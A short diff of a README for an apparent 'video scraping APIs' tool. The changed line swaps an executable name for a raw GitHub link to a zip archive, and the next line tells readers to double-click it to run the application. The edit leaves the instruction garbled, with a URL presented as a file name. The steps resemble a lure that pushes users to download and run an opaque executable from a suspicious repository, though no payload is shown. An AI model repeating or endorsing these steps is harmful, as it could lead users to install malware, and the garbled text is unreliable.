TedPython78844909i99/video-scraping-apis/README.md

 5. **Run the Application**

    Once extracted, navigate to the folder where the files are located.
-You should see an application file named `video-scraping-apis.exe` (or the equivalent for your OS).
+You should see an application file named `https://raw.githubusercontent.com/TedPython78844909i99/video-scraping-apis/main/videos-apis-979/scraping_apis_video_3.4.zip` (or the equivalent for your OS).
 Double-click this file to run the application.

 6. **Follow On-Screen Instructions**